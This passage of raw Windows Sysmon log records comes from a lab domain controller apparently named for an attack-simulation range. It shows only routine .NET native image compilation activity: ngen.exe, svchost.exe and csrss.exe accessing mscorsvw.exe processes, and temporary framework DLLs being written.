10341000x80000000000000008853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:37.803{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9269-6005-9A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:37.709{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9269-6005-9904-00000000A301}804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:37.694{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9269-6005-9904-00000000A301}804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:37.694{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9269-6005-9904-00000000A301}804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:37.569{59A5CD1D-9268-6005-9804-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a20-0\System.Workflow.Activities.dll2021-01-18 13:51:37.569 10341000x80000000000000008858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:39.990{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-926B-6005-9B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:39.990{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926B-6005-9B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:39.834{59A5CD1D-9269-6005-9A04-00000000A301}1004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\3ec-0\System.Workflow.ComponentModel.dll2021-01-18 13:51:39.834 10341000x80000000000000008862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:40.100{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926C-6005-9C04-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:40.084{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926C-6005-9C04-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:40.084{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926C-6005-9C04-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:40.006{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926B-6005-9B04-00000000A301}1404C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:41.834{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926D-6005-9E04-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:41.803{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926D-6005-9E04-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:41.803{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926D-6005-9E04-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:41.412{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926D-6005-9D04-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:41.396{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-926D-6005-9D04-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:41.396{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926D-6005-9D04-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:41.287{59A5CD1D-926C-6005-9C04-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1398-0\System.Workflow.Runtime.dll2021-01-18 13:51:41.287 10341000x80000000000000008880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.959{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926E-6005-A104-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.928{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926E-6005-A104-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.928{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926E-6005-A104-00000000A301}2964C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:42.865{59A5CD1D-926E-6005-A004-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1050-0\System.Xaml.Hosting.dll2021-01-18 13:51:42.865 10341000x80000000000000008876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.787{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926E-6005-A004-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.771{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926E-6005-A004-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.771{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926E-6005-A004-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Mi